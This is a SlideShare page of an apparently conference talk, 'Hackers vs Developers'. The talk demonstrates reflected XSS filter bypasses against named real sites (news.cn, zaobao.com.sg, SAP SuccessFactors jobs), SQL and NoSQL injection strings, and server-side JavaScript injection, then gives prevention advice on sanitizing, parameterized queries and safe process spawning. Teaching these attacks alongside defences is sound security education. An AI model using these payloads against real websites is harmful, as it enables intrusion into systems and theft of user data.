SlideShare a Scribd company logo

Hackers vs developers

Download as PPTX, PDF
Soumyasanto Sen
Soumyasanto Sen

Hackers and developers are compared in the document. Hackers are described as skillful with deep technical understanding but often unsocial and focused on breaking systems. Developers are portrayed as true professionals who work with people to build applications and believe they can change the world. The document then provides examples of how hacking can look simple, such as cross-site scripting attacks on websites. It offers suggestions for prevention including input sanitization and access control. Later it discusses hacking in Node.js and risks of SQL and NoSQL injection. Finally it addresses how hacking and development skills could be applied for social good or security testing.

Technology
1 of 36
Soumyasanto Sen, #sitWDF Hackers versus Developers The GAME is ON
Introduction Player 1 : Hackers Expert: Skillful, with detailed understanding of some area deeply, often scarily deeply. Unsocial: Don’t want to come out of the shell. Breaker: Hack Apps Cool: People think that they are cool and they think they are Awesome. Super Power: They believe that they can be "Masters of the Universe" #sitWDF Controller: Can use lot of Systems and Languages and get them talk to each other. Social: True and broad professionals, work with people and communicate well Builder: Create Apps Boring: There are other more important things in life than just coding. Super Power: They believe they can change this World. Player 2 : Developers VS
#sitWDF
#sitWDF #sitWDF
#sitWDF
Hacking looks ‘Simple’ #sitWDF XSS - Cross Site Scripting JavaScript's Built-In Function(s) decodeURI: decodes encoded URI http://t.home.news.cn/spIndex.action?ds=all&h=458&pageSize=20&temp=topicRoll&topic="xx xxxxxx'yyyyy</img Possibilities: • '-confirm(1)-' • '-confirm`1`-' http://t.home.news.cn/spIndex.action?ds=all&h=458&pageSize=20&temp=topicRoll&topic='-c onfirm(1)-‘ var topic = decodeURI('');confirm(1);(''); var topic = decodeURI('');confirm(1);//');
Hacking looks ‘Simple’ #sitWDF XSS - Cross Site Scripting
Hacking looks ‘Simple’ #sitWDF XSS - Cross Site Scripting JavaScript's Built-In Function(s) replace (JS String replace Method): returns a string after a pattern http://www.zaobao.com.sg/search/site/"xxxxxxxx'yyyyy</img Possibilities: http://www.zaobao.com.sg/search/site/"-confirm(1)-" http://www.zaobao.com.sg/search/site/");confirm(1);(" http://www.zaobao.com.sg/search/site/");confirm(1);// (does not work because // is filtered)
Hacking looks ‘Simple’ #sitWDF XSS - Cross Site Scripting
Easy Rules #sitWDF Preventions • XSS (Cross Site Scripting) Prevention Cheat Sheet from OWASP • HTML5 Security Clean Sheet • Secure Coding Practice Guidelines • Use Clean URL's: https://www.site.com/news.php?id=1337 is way more tempting than https://www.site.com/news/some-news-or-today • Sanitize Inputs: Must for XSS • Controlling Access Control: http://www.site.com/phpmyadmin gave us access to comple te database! No injection, nothing • Validation on Input. • Use White-Listing • Switch-Off Errors.
Easy Rules #sitWDF Remember “Successful hackers are not just good at hacking. What makes a great hacker successful is that they are excellent at understanding human nature.” ( Developers love their code, just like its their child. ) “Do not trust anything ever, specially when it comes to user input.” “Security is about layers. It has to be because no single layer can be guaranteed to actually be secure” Security is nothing but an ILLUSION.
#sitWDF #sitWDF
#sitWDF
Hacking looks ‘Simple’ Even for #sitWDF Breaking SuccessFactors's XSS Filter '-confirm(1)-' was enough to break SAP's SuccessFactors's XSS filter and were able to make hundreds of web applications vulnerable ... https://jobs.sap.com/talentcommunity/login/?returnurl="xxxxxxxx'yyyyy</img Possibilities: • </script><script>alert(1)</script> • '-confirm(1)-'
Hacking looks ‘Simple’ Even for #sitWDF Breaking SuccessFactors's XSS Filter https://jobs.sap.com/talentcommunity/login/?returnurl=</script><script>alert(1)</script> Next Vector: <img src=x onerror=alert(1)>
Hacking looks ‘Simple’ Even for #sitWDF Breaking SuccessFactors's XSS Filter Next Vector: <img src=x onerror=confirm(1)> Next Vector: <a href=javascript:confirm(1)>click</a>
Hacking looks ‘Simple’ Even for #sitWDF Breaking SuccessFactors's XSS Filter Next Vectors: • <p onmouseover=prompt(1)>IamParagraph</p> • <details ontoggle=confirm(1)> • <input type=search onsearch=confirm(1)>
Easy Filtering #sitWDF Context Based Filtering
Easy Filtering #sitWDF Context Based Filtering
Easy Filtering #sitWDF Context Based Filtering Protection against JavaScript execution via `url` e.g., img'ssrc and/or anchor's href attribute Impleme ntation of `urlContextCleaner()`
Easy Filtering #sitWDF External HTML Sanitizer https://developers.google.com/caja/ The Caja project includes a html-sanitizer Example: <script src="html-sanitizer-minified.js"></script> <script> function urlX(url) { if(/^https?:///.test(url)) { return url }} function idX(id) { return id } alert(html_sanitize('<b>hello</b><img src="http://asdf"><a href="javascript:alert(0)"> <script src="http://dfd"></script>', urlX, idX)) </script>
#sitWDF #sitWDF
#sitWDF Node.js is a JavaScript runtime built on Chrome's V8 JavaScript engine
Hacking in Node.js #sitWDF Off Course XSS Improper parsing of nested tags and Incomplete filtering of javascript: URIs <s <onmouseover="alert(1)"> <s onmouseover="alert(1)">This is a test</s> <a href="javascriptJ a V a S c R iPt::alert(1)" "<s>">test</a> (With any Encoding)
Hacking in Node.js #sitWDF Server Side JavaScript Injection Simple JS Command: response.end(“Ended Response”); [pid 25170] execve("/bin/sh", ["/bin/sh", "-c", "ls -l user input"],
Hacking in Node.js #sitWDF SQL and NoSQL Injection Classic SQL Injection Bypass SELECT * FROM users WHERE username = '$username' AND password = '$password‘ (SELECT * FROM users WHERE username = '' or 1=1--' AND password = '‘) select author from books where id=$id -> (select author from books where id=2 or 1=1) Statement stmt = conn.createStatement("INSERT INTO students VALUES('" + user + "')"); stmt.execute(); (Robert'); DROP TABLE students; --) db.users.find({username: username, password: password}); (NoSQL) { "username": {"$gt": ""}, "password": {"$gt": ""} }
Secure Node.js #sitWDF Protection XSS Prevention • Sanitize untrusted HTML http://jsxss.com/en/index.html https://github.com/theSmaw/Caja-HTML-Sanitizer https://www.owasp.org/index.php/Projects/OWASP_Node_js_Goat_Project SSJSI Prevention • Substitution of the eval() with the JSON.parse() function, the code is no longer injectable • Use child_process.execFile or child_process.spawn instead of child_process.exec
Secure Node.js #sitWDF Protection SQL and NoSQL Injection Prevention • Using Parameterize SQL var q = 'SELECT name FROM books WHERE id = $1'; client.query(q, ['3'], function(err, result) {}); • PreparedStatements avoid/prevent SQL Injection Statement stmt = conn.prepareStatement("INSERT INTO student VALUES(?)"); stmt.setString(1, user); stmt.execute(); (Use the $in Operator to Match Values) db.users.find({user: { $in: [user] }, pass: { $in: [pass] }}); (NoSQL)
#sitWDF
Positive Side • Social Good: find solution for social benefit, operations and emergencies • Penetration Testing: to find vulnerabilities that an attacker could exploit • open-source: much of this open-source code is produced, tested and improved by hackers, usually like hackathons #sitWDF Good Cause
Negative Side • Corruption of government officials (58.0%) • Cyber-terrorism (44.8%) • Corporate tracking of personal information (44.6%) • Terrorist attacks (44.4%) • Government tracking of personal information (41.4%) • Bio-warfare (40.9%) • Identity theft (39.6%) • Economic collapse (39.2%) • Running out of money in the future (37.4%) • Credit card fraud (36.9%) • Source: Chapman University #sitWDF Top 10 fears of 2015
Make Difference #sitWDF
Make Difference #sitWDF Source: Scott Hanselman
#sitWDF
Who is the Winner? A "Hacker" is a state of mind. A “Developer" is a state of function. #sitWDF Choice is Yours
#sitWDF Thank You Soumyasanto Sen @soumyasanto

Recommended

Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by default
SecuRing
 
Looking for Vulnerable Code. Vlad Savitsky
Looking for Vulnerable Code. Vlad SavitskyLooking for Vulnerable Code. Vlad Savitsky
Looking for Vulnerable Code. Vlad Savitsky
Vlad Savitsky
 
Application Security around OWASP Top 10
Application Security around OWASP Top 10Application Security around OWASP Top 10
Application Security around OWASP Top 10
Sastry Tumuluri
 
[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...
[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...
[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...
OWASP Russia
 
Secure Coding for NodeJS
Secure Coding for NodeJSSecure Coding for NodeJS
Secure Coding for NodeJS
Thang Chung
 
RSA Conference 2010 San Francisco
RSA Conference 2010 San FranciscoRSA Conference 2010 San Francisco
RSA Conference 2010 San FranciscoAditya K Sood
 
The State of Credential Stuffing and the Future of Account Takeovers.
The State of Credential Stuffing and the Future of Account Takeovers.The State of Credential Stuffing and the Future of Account Takeovers.
The State of Credential Stuffing and the Future of Account Takeovers.
Jarrod Overson
 
AppSecCali - How Credential Stuffing is Evolving
AppSecCali - How Credential Stuffing is EvolvingAppSecCali - How Credential Stuffing is Evolving
AppSecCali - How Credential Stuffing is Evolving
Jarrod Overson
 

Recommended

Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by default
SecuRing
 
Looking for Vulnerable Code. Vlad Savitsky
Looking for Vulnerable Code. Vlad SavitskyLooking for Vulnerable Code. Vlad Savitsky
Looking for Vulnerable Code. Vlad Savitsky
Vlad Savitsky
 
Application Security around OWASP Top 10
Application Security around OWASP Top 10Application Security around OWASP Top 10
Application Security around OWASP Top 10
Sastry Tumuluri
 
[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...
[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...
[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...
OWASP Russia
 
Secure Coding for NodeJS
Secure Coding for NodeJSSecure Coding for NodeJS
Secure Coding for NodeJS
Thang Chung
 
RSA Conference 2010 San Francisco
RSA Conference 2010 San FranciscoRSA Conference 2010 San Francisco
RSA Conference 2010 San FranciscoAditya K Sood
 
The State of Credential Stuffing and the Future of Account Takeovers.
The State of Credential Stuffing and the Future of Account Takeovers.The State of Credential Stuffing and the Future of Account Takeovers.
The State of Credential Stuffing and the Future of Account Takeovers.
Jarrod Overson
 
AppSecCali - How Credential Stuffing is Evolving
AppSecCali - How Credential Stuffing is EvolvingAppSecCali - How Credential Stuffing is Evolving
AppSecCali - How Credential Stuffing is Evolving
Jarrod Overson
 
PHP Secure Programming
PHP Secure ProgrammingPHP Secure Programming
PHP Secure Programming
Balavignesh Kasinathan
 
Security on Rails
Security on RailsSecurity on Rails
Security on RailsDavid Paluy
 
Web Security 101
Web Security 101Web Security 101
Web Security 101
Michael Peters
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by default
Slawomir Jasek
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realities
Brad Hill
 
Drupal campleuven: Secure Drupal Development
Drupal campleuven: Secure Drupal DevelopmentDrupal campleuven: Secure Drupal Development
Drupal campleuven: Secure Drupal Development
Steven Van den Hout
 
Drupal Security Seminar
Drupal Security SeminarDrupal Security Seminar
Drupal Security Seminar
Calibrate
 
PHPUG Presentation
PHPUG PresentationPHPUG Presentation
PHPUG Presentation
Damon Cortesi
 
Security of Web Applications: Top 6 Risks To Avoid
Security of Web Applications: Top 6 Risks To AvoidSecurity of Web Applications: Top 6 Risks To Avoid
Security of Web Applications: Top 6 Risks To Avoid
slicklash
 
Anatomy of a WordPress Hack
Anatomy of a WordPress HackAnatomy of a WordPress Hack
Anatomy of a WordPress Hack
jessepollak
 
Not so blind SQL Injection
Not so blind SQL InjectionNot so blind SQL Injection
Not so blind SQL Injection
Francisco Ribeiro
 
The Ultimate IDS Smackdown
The Ultimate IDS SmackdownThe Ultimate IDS Smackdown
The Ultimate IDS SmackdownMario Heiderich
 
jQuery presentation
jQuery presentationjQuery presentation
jQuery presentationMahesh Reddy
 
DevBeat 2013 - Developer-first Security
DevBeat 2013 - Developer-first SecurityDevBeat 2013 - Developer-first Security
DevBeat 2013 - Developer-first Security
Coverity
 
The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010Mario Heiderich
 
Something Died Inside Your Git Repo
Something Died Inside Your Git RepoSomething Died Inside Your Git Repo
Something Died Inside Your Git Repo
Cliff Smith
 
Crash Course In Brain Surgery
Crash Course In Brain SurgeryCrash Course In Brain Surgery
Crash Course In Brain Surgery
morisson
 
Drupal Security
Drupal SecurityDrupal Security
Drupal Security
Ran Bar-Zik
 
Interpolique
InterpoliqueInterpolique
InterpoliqueDan Kaminsky
 
Interpolique
InterpoliqueInterpolique
InterpoliqueDan Kaminsky
 
Full-RAG: A modern architecture for hyper-personalization
Full-RAG: A modern architecture for hyper-personalizationFull-RAG: A modern architecture for hyper-personalization
Full-RAG: A modern architecture for hyper-personalization
Zilliz
 
GridMate - End to end testing is a critical piece to ensure quality and avoid...
GridMate - End to end testing is a critical piece to ensure quality and avoid...GridMate - End to end testing is a critical piece to ensure quality and avoid...
GridMate - End to end testing is a critical piece to ensure quality and avoid...
ThomasParaiso2
 

More Related Content

Similar to Hackers vs developers

PHP Secure Programming
PHP Secure ProgrammingPHP Secure Programming
PHP Secure Programming
Balavignesh Kasinathan
 
Security on Rails
Security on RailsSecurity on Rails
Security on RailsDavid Paluy
 
Web Security 101
Web Security 101Web Security 101
Web Security 101
Michael Peters
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by default
Slawomir Jasek
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realities
Brad Hill
 
Drupal campleuven: Secure Drupal Development
Drupal campleuven: Secure Drupal DevelopmentDrupal campleuven: Secure Drupal Development
Drupal campleuven: Secure Drupal Development
Steven Van den Hout
 
Drupal Security Seminar
Drupal Security SeminarDrupal Security Seminar
Drupal Security Seminar
Calibrate
 
PHPUG Presentation
PHPUG PresentationPHPUG Presentation
PHPUG Presentation
Damon Cortesi
 
Security of Web Applications: Top 6 Risks To Avoid
Security of Web Applications: Top 6 Risks To AvoidSecurity of Web Applications: Top 6 Risks To Avoid
Security of Web Applications: Top 6 Risks To Avoid
slicklash
 
Anatomy of a WordPress Hack
Anatomy of a WordPress HackAnatomy of a WordPress Hack
Anatomy of a WordPress Hack
jessepollak
 
Not so blind SQL Injection
Not so blind SQL InjectionNot so blind SQL Injection
Not so blind SQL Injection
Francisco Ribeiro
 
The Ultimate IDS Smackdown
The Ultimate IDS SmackdownThe Ultimate IDS Smackdown
The Ultimate IDS SmackdownMario Heiderich
 
jQuery presentation
jQuery presentationjQuery presentation
jQuery presentationMahesh Reddy
 
DevBeat 2013 - Developer-first Security
DevBeat 2013 - Developer-first SecurityDevBeat 2013 - Developer-first Security
DevBeat 2013 - Developer-first Security
Coverity
 
The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010Mario Heiderich
 
Something Died Inside Your Git Repo
Something Died Inside Your Git RepoSomething Died Inside Your Git Repo
Something Died Inside Your Git Repo
Cliff Smith
 
Crash Course In Brain Surgery
Crash Course In Brain SurgeryCrash Course In Brain Surgery
Crash Course In Brain Surgery
morisson
 
Drupal Security
Drupal SecurityDrupal Security
Drupal Security
Ran Bar-Zik
 

Similar to Hackers vs developers (20)

PHP Secure Programming
PHP Secure ProgrammingPHP Secure Programming
PHP Secure Programming
 
Security on Rails
Security on RailsSecurity on Rails
Security on Rails
 
Web Security 101
Web Security 101Web Security 101
Web Security 101
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by default
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realities
 
Drupal campleuven: Secure Drupal Development
Drupal campleuven: Secure Drupal DevelopmentDrupal campleuven: Secure Drupal Development
Drupal campleuven: Secure Drupal Development
 
Drupal Security Seminar
Drupal Security SeminarDrupal Security Seminar
Drupal Security Seminar
 
PHPUG Presentation
PHPUG PresentationPHPUG Presentation
PHPUG Presentation
 
Security of Web Applications: Top 6 Risks To Avoid
Security of Web Applications: Top 6 Risks To AvoidSecurity of Web Applications: Top 6 Risks To Avoid
Security of Web Applications: Top 6 Risks To Avoid
 
Anatomy of a WordPress Hack
Anatomy of a WordPress HackAnatomy of a WordPress Hack
Anatomy of a WordPress Hack
 
Not so blind SQL Injection
Not so blind SQL InjectionNot so blind SQL Injection
Not so blind SQL Injection
 
The Ultimate IDS Smackdown
The Ultimate IDS SmackdownThe Ultimate IDS Smackdown
The Ultimate IDS Smackdown
 
jQuery presentation
jQuery presentationjQuery presentation
jQuery presentation
 
DevBeat 2013 - Developer-first Security
DevBeat 2013 - Developer-first SecurityDevBeat 2013 - Developer-first Security
DevBeat 2013 - Developer-first Security
 
The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010
 
Something Died Inside Your Git Repo
Something Died Inside Your Git RepoSomething Died Inside Your Git Repo
Something Died Inside Your Git Repo
 
Crash Course In Brain Surgery
Crash Course In Brain SurgeryCrash Course In Brain Surgery
Crash Course In Brain Surgery
 
Drupal Security
Drupal SecurityDrupal Security
Drupal Security
 
Interpolique
InterpoliqueInterpolique
Interpolique
 
Interpolique
InterpoliqueInterpolique
Interpolique
 

Recently uploaded

Full-RAG: A modern architecture for hyper-personalization
Full-RAG: A modern architecture for hyper-personalizationFull-RAG: A modern architecture for hyper-personalization
Full-RAG: A modern architecture for hyper-personalization
Zilliz
 
GridMate - End to end testing is a critical piece to ensure quality and avoid...
GridMate - End to end testing is a critical piece to ensure quality and avoid...GridMate - End to end testing is a critical piece to ensure quality and avoid...
GridMate - End to end testing is a critical piece to ensure quality and avoid...
ThomasParaiso2
 
Artificial Intelligence for XMLDevelopment
Artificial Intelligence for XMLDevelopmentArtificial Intelligence for XMLDevelopment
Artificial Intelligence for XMLDevelopment
Octavian Nadolu
 
RESUME BUILDER APPLICATION Project for students
RESUME BUILDER APPLICATION Project for studentsRESUME BUILDER APPLICATION Project for students
RESUME BUILDER APPLICATION Project for students
KAMESHS29
 
Elizabeth Buie - Older adults: Are we really designing for our future selves?
Elizabeth Buie - Older adults: Are we really designing for our future selves?Elizabeth Buie - Older adults: Are we really designing for our future selves?
Elizabeth Buie - Older adults: Are we really designing for our future selves?
Nexer Digital
 
Introduction to CHERI technology - Cybersecurity
Introduction to CHERI technology - CybersecurityIntroduction to CHERI technology - Cybersecurity
Introduction to CHERI technology - Cybersecurity
mikeeftimakis1
 
20240605 QFM017 Machine Intelligence Reading List May 2024
20240605 QFM017 Machine Intelligence Reading List May 202420240605 QFM017 Machine Intelligence Reading List May 2024
20240605 QFM017 Machine Intelligence Reading List May 2024
Matthew Sinclair
 
Video Streaming: Then, Now, and in the Future
Video Streaming: Then, Now, and in the FutureVideo Streaming: Then, Now, and in the Future
Video Streaming: Then, Now, and in the Future
Alpen-Adria-Universität
 
Enchancing adoption of Open Source Libraries. A case study on Albumentations.AI
Enchancing adoption of Open Source Libraries. A case study on Albumentations.AIEnchancing adoption of Open Source Libraries. A case study on Albumentations.AI
Enchancing adoption of Open Source Libraries. A case study on Albumentations.AI
Vladimir Iglovikov, Ph.D.
 
How to Get CNIC Information System with Paksim Ga.pptx
How to Get CNIC Information System with Paksim Ga.pptxHow to Get CNIC Information System with Paksim Ga.pptx
How to Get CNIC Information System with Paksim Ga.pptx
danishmna97
 
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
James Anderson
 
Generative AI Deep Dive: Advancing from Proof of Concept to Production
Generative AI Deep Dive: Advancing from Proof of Concept to ProductionGenerative AI Deep Dive: Advancing from Proof of Concept to Production
Generative AI Deep Dive: Advancing from Proof of Concept to Production
Aggregage
 
Essentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FMEEssentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FME
Safe Software
 
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!
SOFTTECHHUB
 
Uni Systems Copilot event_05062024_C.Vlachos.pdf
Uni Systems Copilot event_05062024_C.Vlachos.pdfUni Systems Copilot event_05062024_C.Vlachos.pdf
Uni Systems Copilot event_05062024_C.Vlachos.pdf
Uni Systems S.M.S.A.
 
GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024
GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024
GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024
Neo4j
 
Pushing the limits of ePRTC: 100ns holdover for 100 days
Pushing the limits of ePRTC: 100ns holdover for 100 daysPushing the limits of ePRTC: 100ns holdover for 100 days
Pushing the limits of ePRTC: 100ns holdover for 100 days
Adtran
 
PCI PIN Basics Webinar from the Controlcase Team
PCI PIN Basics Webinar from the Controlcase TeamPCI PIN Basics Webinar from the Controlcase Team
PCI PIN Basics Webinar from the Controlcase Team
ControlCase
 
A tale of scale & speed: How the US Navy is enabling software delivery from l...
A tale of scale & speed: How the US Navy is enabling software delivery from l...A tale of scale & speed: How the US Navy is enabling software delivery from l...
A tale of scale & speed: How the US Navy is enabling software delivery from l...
sonjaschweigert1
 
Building RAG with self-deployed Milvus vector database and Snowpark Container...
Building RAG with self-deployed Milvus vector database and Snowpark Container...Building RAG with self-deployed Milvus vector database and Snowpark Container...
Building RAG with self-deployed Milvus vector database and Snowpark Container...
Zilliz
 

Recently uploaded (20)

Full-RAG: A modern architecture for hyper-personalization
Full-RAG: A modern architecture for hyper-personalizationFull-RAG: A modern architecture for hyper-personalization
Full-RAG: A modern architecture for hyper-personalization
 
GridMate - End to end testing is a critical piece to ensure quality and avoid...
GridMate - End to end testing is a critical piece to ensure quality and avoid...GridMate - End to end testing is a critical piece to ensure quality and avoid...
GridMate - End to end testing is a critical piece to ensure quality and avoid...
 
Artificial Intelligence for XMLDevelopment
Artificial Intelligence for XMLDevelopmentArtificial Intelligence for XMLDevelopment
Artificial Intelligence for XMLDevelopment
 
RESUME BUILDER APPLICATION Project for students
RESUME BUILDER APPLICATION Project for studentsRESUME BUILDER APPLICATION Project for students
RESUME BUILDER APPLICATION Project for students
 
Elizabeth Buie - Older adults: Are we really designing for our future selves?
Elizabeth Buie - Older adults: Are we really designing for our future selves?Elizabeth Buie - Older adults: Are we really designing for our future selves?
Elizabeth Buie - Older adults: Are we really designing for our future selves?
 
Introduction to CHERI technology - Cybersecurity
Introduction to CHERI technology - CybersecurityIntroduction to CHERI technology - Cybersecurity
Introduction to CHERI technology - Cybersecurity
 
20240605 QFM017 Machine Intelligence Reading List May 2024
20240605 QFM017 Machine Intelligence Reading List May 202420240605 QFM017 Machine Intelligence Reading List May 2024
20240605 QFM017 Machine Intelligence Reading List May 2024
 
Video Streaming: Then, Now, and in the Future
Video Streaming: Then, Now, and in the FutureVideo Streaming: Then, Now, and in the Future
Video Streaming: Then, Now, and in the Future
 
Enchancing adoption of Open Source Libraries. A case study on Albumentations.AI
Enchancing adoption of Open Source Libraries. A case study on Albumentations.AIEnchancing adoption of Open Source Libraries. A case study on Albumentations.AI
Enchancing adoption of Open Source Libraries. A case study on Albumentations.AI
 
How to Get CNIC Information System with Paksim Ga.pptx
How to Get CNIC Information System with Paksim Ga.pptxHow to Get CNIC Information System with Paksim Ga.pptx
How to Get CNIC Information System with Paksim Ga.pptx
 
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
 
Generative AI Deep Dive: Advancing from Proof of Concept to Production
Generative AI Deep Dive: Advancing from Proof of Concept to ProductionGenerative AI Deep Dive: Advancing from Proof of Concept to Production
Generative AI Deep Dive: Advancing from Proof of Concept to Production
 
Essentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FMEEssentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FME
 
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!
 
Uni Systems Copilot event_05062024_C.Vlachos.pdf
Uni Systems Copilot event_05062024_C.Vlachos.pdfUni Systems Copilot event_05062024_C.Vlachos.pdf
Uni Systems Copilot event_05062024_C.Vlachos.pdf
 
GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024
GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024
GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024
 
Pushing the limits of ePRTC: 100ns holdover for 100 days
Pushing the limits of ePRTC: 100ns holdover for 100 daysPushing the limits of ePRTC: 100ns holdover for 100 days
Pushing the limits of ePRTC: 100ns holdover for 100 days
 
PCI PIN Basics Webinar from the Controlcase Team
PCI PIN Basics Webinar from the Controlcase TeamPCI PIN Basics Webinar from the Controlcase Team
PCI PIN Basics Webinar from the Controlcase Team
 
A tale of scale & speed: How the US Navy is enabling software delivery from l...
A tale of scale & speed: How the US Navy is enabling software delivery from l...A tale of scale & speed: How the US Navy is enabling software delivery from l...
A tale of scale & speed: How the US Navy is enabling software delivery from l...
 
Building RAG with self-deployed Milvus vector database and Snowpark Container...
Building RAG with self-deployed Milvus vector database and Snowpark Container...Building RAG with self-deployed Milvus vector database and Snowpark Container...
Building RAG with self-deployed Milvus vector database and Snowpark Container...
 

Hackers vs developers

  • 1. Soumyasanto Sen, #sitWDF Hackers versus Developers The GAME is ON
  • 2. Introduction Player 1 : Hackers Expert: Skillful, with detailed understanding of some area deeply, often scarily deeply. Unsocial: Don’t want to come out of the shell. Breaker: Hack Apps Cool: People think that they are cool and they think they are Awesome. Super Power: They believe that they can be "Masters of the Universe" #sitWDF Controller: Can use lot of Systems and Languages and get them talk to each other. Social: True and broad professionals, work with people and communicate well Builder: Create Apps Boring: There are other more important things in life than just coding. Super Power: They believe they can change this World. Player 2 : Developers VS
  • 6. Hacking looks ‘Simple’ #sitWDF XSS - Cross Site Scripting JavaScript's Built-In Function(s) decodeURI: decodes encoded URI http://t.home.news.cn/spIndex.action?ds=all&h=458&pageSize=20&temp=topicRoll&topic="xx xxxxxx'yyyyy</img Possibilities: • '-confirm(1)-' • '-confirm`1`-' http://t.home.news.cn/spIndex.action?ds=all&h=458&pageSize=20&temp=topicRoll&topic='-c onfirm(1)-‘ var topic = decodeURI('');confirm(1);(''); var topic = decodeURI('');confirm(1);//');
  • 7. Hacking looks ‘Simple’ #sitWDF XSS - Cross Site Scripting
  • 8. Hacking looks ‘Simple’ #sitWDF XSS - Cross Site Scripting JavaScript's Built-In Function(s) replace (JS String replace Method): returns a string after a pattern http://www.zaobao.com.sg/search/site/"xxxxxxxx'yyyyy</img Possibilities: http://www.zaobao.com.sg/search/site/"-confirm(1)-" http://www.zaobao.com.sg/search/site/");confirm(1);(" http://www.zaobao.com.sg/search/site/");confirm(1);// (does not work because // is filtered)
  • 9. Hacking looks ‘Simple’ #sitWDF XSS - Cross Site Scripting
  • 10. Easy Rules #sitWDF Preventions • XSS (Cross Site Scripting) Prevention Cheat Sheet from OWASP • HTML5 Security Clean Sheet • Secure Coding Practice Guidelines • Use Clean URL's: https://www.site.com/news.php?id=1337 is way more tempting than https://www.site.com/news/some-news-or-today • Sanitize Inputs: Must for XSS • Controlling Access Control: http://www.site.com/phpmyadmin gave us access to comple te database! No injection, nothing • Validation on Input. • Use White-Listing • Switch-Off Errors.
  • 11. Easy Rules #sitWDF Remember “Successful hackers are not just good at hacking. What makes a great hacker successful is that they are excellent at understanding human nature.” ( Developers love their code, just like its their child. ) “Do not trust anything ever, specially when it comes to user input.” “Security is about layers. It has to be because no single layer can be guaranteed to actually be secure” Security is nothing but an ILLUSION.
  • 14. Hacking looks ‘Simple’ Even for #sitWDF Breaking SuccessFactors's XSS Filter '-confirm(1)-' was enough to break SAP's SuccessFactors's XSS filter and were able to make hundreds of web applications vulnerable ... https://jobs.sap.com/talentcommunity/login/?returnurl="xxxxxxxx'yyyyy</img Possibilities: • </script><script>alert(1)</script> • '-confirm(1)-'
  • 15. Hacking looks ‘Simple’ Even for #sitWDF Breaking SuccessFactors's XSS Filter https://jobs.sap.com/talentcommunity/login/?returnurl=</script><script>alert(1)</script> Next Vector: <img src=x onerror=alert(1)>
  • 16. Hacking looks ‘Simple’ Even for #sitWDF Breaking SuccessFactors's XSS Filter Next Vector: <img src=x onerror=confirm(1)> Next Vector: <a href=javascript:confirm(1)>click</a>
  • 17. Hacking looks ‘Simple’ Even for #sitWDF Breaking SuccessFactors's XSS Filter Next Vectors: • <p onmouseover=prompt(1)>IamParagraph</p> • <details ontoggle=confirm(1)> • <input type=search onsearch=confirm(1)>
  • 20. Easy Filtering #sitWDF Context Based Filtering Protection against JavaScript execution via `url` e.g., img'ssrc and/or anchor's href attribute Impleme ntation of `urlContextCleaner()`
  • 21. Easy Filtering #sitWDF External HTML Sanitizer https://developers.google.com/caja/ The Caja project includes a html-sanitizer Example: <script src="html-sanitizer-minified.js"></script> <script> function urlX(url) { if(/^https?:///.test(url)) { return url }} function idX(id) { return id } alert(html_sanitize('<b>hello</b><img src="http://asdf"><a href="javascript:alert(0)"> <script src="http://dfd"></script>', urlX, idX)) </script>
  • 23. #sitWDF Node.js is a JavaScript runtime built on Chrome's V8 JavaScript engine
